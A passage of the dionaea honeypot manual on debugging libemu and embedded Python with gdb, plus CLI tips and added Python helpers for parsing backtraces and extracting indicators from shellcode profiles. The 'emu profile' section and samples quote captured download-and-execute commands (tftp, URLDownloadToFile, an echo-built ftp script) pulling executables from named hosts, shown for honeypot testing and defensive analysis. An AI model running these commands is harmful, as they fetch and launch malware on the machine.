2594          Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2595
2596       Once it crashed, I retrieved a full backtrace:
2597
2598          Program received signal SIGSEGV, Segmentation fault.
2599          env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600          545                             struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2601
2602          (gdb) bt full
2603          #0  env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2604                  dll = 0x6366f0
2605                  ehi = <value optimized out>
2606                  hook = <value optimized out>
2607                  c = 0x611180
2608                  mem = <value optimized out>
2609                  eip_save = <value optimized out>
2610                  module = 2088763392
2611                  p_procname = 4289925
2612                  procname = <value optimized out>
2613          #1  0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2614                  dll = <value optimized out>
2615                  ehi = <value optimized out>
2616                  hook = 0x64c5b0
2617                  eip = <value optimized out>
2618          #2  0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2619                  hook = 0xe2
2620                  ev = 0x0
2621                  iv = <value optimized out>
2622                  cpu = 0x611180
2623                  mem = <value optimized out>
2624                  env = 0x629a30
2625                  na = <value optimized out>
2626                  j = 7169
2627                  last_vertex = 0x0
2628                  graph = 0x0
2629                  eh = 0x0
2630                  ehi = 0x0
2631                  ret = <value optimized out>
2632                  eipsave = 2088807840
2633          #3  0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2634                  e = <value optimized out>
2635
2636       In this case, the problem was a bug in libemu.

2637          gdb dump memory
2638
2639       Once again, it broke, and we got a backtrace:
2640
2641          #0  0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2642                  eqi = (struct emu_queue_item *) 0x0
2643          #1  0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2644                  steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2645                  current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2646                  current_pos_ht = <value optimized out>
2647                  current_pos_v = <value optimized out>
2648                  current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2649                  bfs_queue = (struct emu_queue *) 0xb3e17668
2650                  ret = 4662443
2651                  eipsave = <value optimized out>
2652                  hook = <value optimized out>
2653                  j = 4
2654                  es = <value optimized out>
2655                  eli = (struct emu_list_item *) 0xb3e17658
2656                  cpu = (struct emu_cpu *) 0xb4109ab0
2657                  mem = (struct emu_memory *) 0xb410c3a0
2658                  eq = (struct emu_queue *) 0xb3da0918
2659                  env = (struct emu_env *) 0xb3e10208
2660                  eli = (struct emu_list_item *) 0x4724ab
2661          #2  0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2662                  es = (struct emu_stats *) 0xb3d92b28
2663                  new_results = (struct emu_list_root *) 0xb3da3bf0
2664                  offset = <value optimized out>
2665                  el = (struct emu_list_root *) 0xb4100510
2666                  etas = (struct emu_track_and_source *) 0xb410cd60
2667                  eh = (struct emu_hashtable *) 0xb3d7a810
2668                  eli = (struct emu_list_item *) 0xb3d92b40
2669                  results = (struct emu_list_root *) 0xb3d82850
2670                  es = <value optimized out>
2671                  __PRETTY_FUNCTION__ = "emu_shellcode_test"
2672          #3  0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2673                  e = (struct emu *) 0xb4109cd0
2674                  ctx = (struct emu_ctx *) 0x87a2400
2675                  offset = 14356
2676                  streamdata = (void *) 0xb411c698
2677                  size = 8196
2678                  ret = 0
2679                  __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2680          #4  0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2681          No locals.
2682          #5  0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2683                  con = (struct connection *) 0x8864b58
2684                  pd = (struct processor_data *) 0x87dc388
2685                  __PRETTY_FUNCTION__ = "processors_io_in_thread"
2686          #6  0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2687                  t = (struct thread *) 0x87d7bd0
2688                  timer = (GTimer *) 0xb4108540
2689          #7  0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2690                  task = (gpointer) 0x87d7bd0
2691                  pool = (GRealThreadPool *) 0x83db460
2692          #8  0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2693                  __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2694          #9  0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2695          No symbol table info available.
2696          #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2697          No symbol table info available.
2698
2699       Again, it was a bug in libemu, an endless loop consuming all memory.
2700       To reproduce, we have to dump the tested buffer, therefore we need the
2701       buffer's address and size. Luckily the size is noted in frame #3 as
2702       8196, and the data address is a parameter which was not optimized out
2703       in frame #2 (frame #3 shows the same address as streamdata). gdb's dump
           command takes the start address and the exclusive end address, so the
           end is 0xb411c698 + 8196 = 0xb411e69c:
2704
2705          dump binary memory /tmp/sc.bin 0xb411c698 0xb411e69c
2706
2707       Afterwards, debugging libemu by feeding the data into sctest is easy.
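Reading the address and the size out of a long `bt full` by hand is error prone, so here is an added example (my own script, not part of dionaea or libemu) that parses such a backtrace, picks the innermost frame that carries both a data pointer and a numeric size, and prints the gdb dump command with the end address computed from them. It assumes the buffer shows up as a `data` or `streamdata` value and its length as `size` in the same frame, as in frame #3 above; the embedded sample backtrace is a trimmed copy of frames #0, #2 and #3 from this section.

```python
import re

# Constructed sample: frames #0, #2 and #3 of the `bt full` output above,
# with most locals trimmed.
SAMPLE_BT = """\
#0  0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
        eqi = (struct emu_queue_item *) 0x0
#2  0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
        es = (struct emu_stats *) 0xb3d92b28
        offset = <value optimized out>
#3  0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
        e = (struct emu *) 0xb4109cd0
        offset = 14356
        streamdata = (void *) 0xb411c698
        size = 8196
        ret = 0
"""

# A frame starts with "#N" at the beginning of a line.
FRAME_SPLIT = re.compile(r'(?m)^[ \t]*#(\d+)[ \t]+')
# name=value pairs in the frame header (parameters) and "name = value"
# lines (locals); an optional cast such as "(void *)" may precede the
# value. "<value optimized out>" and other non-numeric values are skipped.
ASSIGN_RE = re.compile(r'\b(\w+)\s*=\s*(?:\([^)]*\)\s*)?(0x[0-9a-fA-F]+|-?\d+)\b')


def _to_int(raw):
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw)


def parse_frames(bt_text):
    """Return [(frame_number, {name: int})] for every frame in bt output."""
    parts = FRAME_SPLIT.split(bt_text)
    frames = []
    for i in range(1, len(parts) - 1, 2):
        num, body = int(parts[i]), parts[i + 1]
        values = {}
        for name, raw in ASSIGN_RE.findall(body):
            values.setdefault(name, _to_int(raw))   # first occurrence wins
        frames.append((num, values))
    return frames


def find_buffer(bt_text, data_names=("streamdata", "data"), size_name="size"):
    """Innermost frame carrying both a data pointer and a positive size.

    Requiring both in the same frame avoids picking up an unrelated `data`
    parameter (the queue item in frame #0 above) or a frame whose size was
    optimized out (frame #2).
    """
    for num, values in parse_frames(bt_text):
        size = values.get(size_name)
        addr = next((values[n] for n in data_names if n in values), None)
        if size is not None and size > 0 and addr is not None:
            return num, addr, size
    return None


def dump_command(bt_text, path="/tmp/sc.bin"):
    """gdb command that dumps the buffer; the stop address is exclusive."""
    found = find_buffer(bt_text)
    if found is None:
        raise ValueError("no frame with both a data pointer and a size")
    _num, addr, size = found
    return "dump binary memory %s 0x%x 0x%x" % (path, addr, addr + size)


if __name__ == "__main__":
    print(dump_command(SAMPLE_BT))
```

Paste the output of `bt full` into a file and feed it to `dump_command`; the printed line can be pasted back into gdb and the resulting file fed to sctest as shown above.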
2708
2709       I’ve had fun with objgraph and gdb debugging reference count leaks in
2710       python too; the writeup is at http://carnivore.it/2009/12/23/arcane_bugs.
2711
2712
2713          gdb python3 embedded
2714
2715       Sometimes,  there  is  something wrong with the python scripts, but gdb
2716       does not provide any useful output:
2717
2718          bt full
2719          #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2720                  stack_pointer = (PyObject **) 0x8259af0
2721                  next_instr = (unsigned char *) 0x812fabf "m'"
2722                  opcode = 100
2723                  oparg = <value optimized out>
2724                  why = 3071731824
2725                  err = 1
2726                  x = (PyObject *) 0xb7244aac
2727                  v = <value optimized out>
2728                  w = (PyObject *) 0xadb5e4dc
2729                  u = (PyObject *) 0xb775ccb0
2730                  freevars = (PyObject **) 0x8259af0
2731                  retval = (PyObject *) 0x0
2732                  tstate = (PyThreadState *) 0x809aab0
2733                  co = (PyCodeObject *) 0xb717b800
2734                  instr_ub = -1
2735                  instr_lb = 0
2736                  instr_prev = -1
2737                  first_instr = (unsigned char *) 0x812f918 "t"
2738                  names = (PyObject *) 0xb723f50c
2739                  consts = (PyObject *) 0xb71c9f7c
2740                  opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2741            0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2742            0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2743            0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2744            0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2745            0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2746            0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2747            0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2748            0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2749            0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2750            0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2751          #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2752                  defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2753                  f = (PyFrameObject *) 0x825998c
2754                  retval = <value optimized out>
2755                  freevars = (PyObject **) 0x8259af0
2756                  tstate = (PyThreadState *) 0x809aab0
2757                  x = <value optimized out>
2758                  u = <value optimized out>
2759
2760       Luckily python3 ships with some gdb macros, which assist in dealing
2761       with this mess. You can grab them from
2762       http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup
2763       and place them in ~/.gdbinit, where ~ is the home directory of the user
2764       dionaea runs as. If you get "warning: not using untrusted file
2765       /home/user/.gdbinit" you are running gdb via sudo, and the file
2766       /home/user/.gdbinit has to be owned by root. If you are running as
2767       root, and you get "Program received signal SIGTTOU, Stopped (tty
2768       output)." (raised when a background process writes to a tty that has
           the tostop flag set), run stty -tostop before running gdb, reattach
2769       the process with fg, close gdb properly, and start over.
2770
2771       Once  you  got  the macros loaded properly at gdb startup, set a break‐
2772       point on PyEval_EvalFrameEx after dionaea loaded everything:
2773
2774          break PyEval_EvalFrameEx
2775
2776       Then we have some useful macros for gdb:
2777
2778          up
2779          pyframev
2780
2781       pyframev combines the output of pyframe and pylocals.
2782
2783       Be aware that you can segfault dionaea from within gdb now: going up,
2784       out of the python call stack, and calling some of the macros can and in
2785       most cases will segfault dionaea, therefore use backtrace to make sure
2786       you are still within valid frames. We can’t use pystack or pystackv as
2787       they rely on Py_Main, which is an invalid assumption for embedded
2788       python.
2789

TIPS AND TRICKS

2791       dionaea embeds a python interpreter, and can therefore offer a python
2792       cli too. The python cli is blocking: while you are entering a command,
2793       the whole process waits for you to finish it, and does not accept any
2794       new connections. You can use the python cli to interact with dionaea,
2795       which is very useful for development and debugging.
2796
2797   Configuration
2798       You can access the dionaea.conf via python (readonly):
2799
2800          from dionaea import g_dionaea
2801          g_dionaea.config()
2802
2803   Completion and History on the CLI
2804       If you use the cli often, you can make it behave like a real shell,
2805       including history and completion:
2806
2807          import rlcompleter, readline
2808          readline.parse_and_bind('tab: complete')
2809
2810   Triggering Downloads
2811       Sometimes it helps to trigger a download, without waiting  for  an  at‐
2812       tack.   Very  useful if you want to verify permissions are correct when
2813       switching the user, or making sure a submission to a  3rd  party  works
2814       correctly.  You can trigger downloads for all major protocols.
2815
2816   ftp
2817          from dionaea.ftp import ftp
2818          f = ftp()
2819          f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2820
2821   tftp
2822          from dionaea.tftp import TftpClient
2823          t = TftpClient()
2824          t.download(None, 'tftp.example.com', 69, 'filename')
2825
2826   http
2827       As  the http download is not done in python, we do not use the download
2828       facility directly, but create an incident, which will trigger the down‐
2829       load:
2830
2831          from dionaea.core import incident
2832          i = incident("dionaea.download.offer")
2833          i.set("url", "http://www.honeynet.org")
2834          i.report()
2835
2836   incidents
2837       incidents are the ipc used in dionaea.
2838
2839   dumping
2840          from dionaea.core import ihandler
2841          class idumper(ihandler):
                  # receives every incident whose origin matches pattern
                  # ('*' matches all of them) and dumps its fields
2842              def __init__(self, pattern):
2843                  ihandler.__init__(self, pattern)
2844              def handle(self, icd):
2845                  icd.dump()
2846
2847          a = idumper('*')
2848
2849   emu profile
2850       Small collection of various shellcode profiles gathered from dionaea.
2851
2852   CreateProcess Commands
2853       This profile will trigger a download via tftp.
2854
2855          p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2856          from dionaea.core import incident
2857          i = incident("dionaea.module.emu.profile")
2858          i.set("profile", str(p))
2859          i.report()
2860
2861   URLDownloadToFile
2862       This profile will trigger a download.
2863
2864          p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2865          from dionaea.core import incident
2866          i = incident("dionaea.module.emu.profile")
2867          i.set("profile", str(p))
2868          i.report()
2869
2870   WinExec Commands
2871       This profile uses WinExec to create a command file for the windows ftp
2872       client, downloads a file, and executes the file:
2873
2874          p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2875          from dionaea.core import incident
2876          i = incident("dionaea.module.emu.profile")
2877          i.set("profile", str(p))
2878          i.report()
2879
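The profiles above are JSON lists of emulated API calls, and the same list is what a honeypot operator wants to turn into indicators. As an added example that is not dionaea's own code, here is a small Python extractor that pulls download URLs, dropped file names, contacted hosts and raw command lines out of such a profile, covering the three patterns shown in this section: URLDownloadToFile, a tftp fetch via CreateProcess, and an ftp script written with echo and run via WinExec. The sample profiles are the ones from this section (the CreateProcess one with its STARTUPINFO and PROCESS_INFORMATION dicts trimmed to {}); the regular expressions for the tftp and ftp command lines are my own heuristics, not something dionaea ships.

```python
import json
import re
from urllib.parse import urlsplit

# Sample profiles in the same shape as the ones above: a JSON list of
# {"call", "args", "return"} records. URLDL_PROFILE and FTP_PROFILE are
# copied from this section; TFTP_PROFILE is the CreateProcess profile with
# the STARTUPINFO/PROCESS_INFORMATION dicts trimmed to {}.
URLDL_PROFILE = ('[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, '
                 '{"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, '
                 '{"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]')
TFTP_PROFILE = ('[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {}, {}], "return": "-1"}, '
                '{"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {}, {}], "return": "-1"}, '
                '{"call": "ExitThread", "args": ["0"], "return": "0"}]')
FTP_PROFILE = ('[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i '
               '&echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, '
               '{"call": "ExitThread", "args": ["0"], "return": "0"}]')

# Heuristics (mine, not dionaea's) for the two command-line download idioms
# seen in the profiles: "tftp -i HOST get FILE" and an ftp script built
# from "echo open/user/get ... > file" and run with "ftp -s:file".
TFTP_RE = re.compile(r'\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)', re.I)
FTP_OPEN_RE = re.compile(r'echo\s+open\s+([\w.-]+)(?:\s+(\d+))?', re.I)
FTP_USER_RE = re.compile(r'echo\s+user\s+(\S+)\s+(\S+)', re.I)
FTP_GET_RE = re.compile(r'echo\s+get\s+(\S+)', re.I)


def parse_profile(profile_json):
    """Load a profile, rejecting records that lack call/args/return."""
    calls = json.loads(profile_json)
    if not isinstance(calls, list):
        raise ValueError("profile must be a JSON list of call records")
    for rec in calls:
        if not isinstance(rec, dict) or not {"call", "args", "return"} <= set(rec):
            raise ValueError("malformed call record: %r" % (rec,))
    return calls


def _dedupe(items):
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def extract_iocs(profile_json):
    """Download URLs, dropped file names, contacted hosts and raw command
    lines implied by an emu profile."""
    urls, files, commands = [], [], []
    for rec in parse_profile(profile_json):
        call, args = rec["call"], rec["args"]
        if call == "URLDownloadToFile" and len(args) >= 3:
            # URLDownloadToFile(pCaller, szURL, szFileName, dwReserved, lpfnCB)
            urls.append(args[1])
            files.append(args[2])
        elif call == "WinExec" and len(args) >= 1:
            commands.append(args[0])        # WinExec(lpCmdLine, uCmdShow)
        elif call == "CreateProcess" and len(args) >= 2:
            commands.append(args[1])        # CreateProcess(lpApplicationName, lpCommandLine, ...)
    for cmd in commands:
        m = TFTP_RE.search(cmd)
        if m:
            host, name = m.groups()
            urls.append("tftp://%s/%s" % (host, name))
            files.append(name)
        m = FTP_OPEN_RE.search(cmd)
        if m:
            host, port = m.group(1), m.group(2) or "21"
            u = FTP_USER_RE.search(cmd)
            cred = "%s:%s@" % u.groups() if u else ""
            for g in FTP_GET_RE.finditer(cmd):
                urls.append("ftp://%s%s:%s/%s" % (cred, host, port, g.group(1)))
                files.append(g.group(1))
    hosts = [urlsplit(u).hostname for u in urls]
    return {"urls": _dedupe(urls), "files": _dedupe(files),
            "hosts": _dedupe(h for h in hosts if h), "commands": commands}


if __name__ == "__main__":
    for label, prof in (("URLDownloadToFile", URLDL_PROFILE),
                        ("tftp", TFTP_PROFILE), ("ftp", FTP_PROFILE)):
        print(label, extract_iocs(prof))
```

The raw command lines are kept in the result on purpose: the regular expressions only cover the idioms seen here, so anything they miss is still visible for manual review.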

AUTHOR

2887       dionaea
2888
2890       2021, dionaea
2891
2892
2893
2894
2895       0.7.0                            Jan 26, 2021                       DIONAEA(1)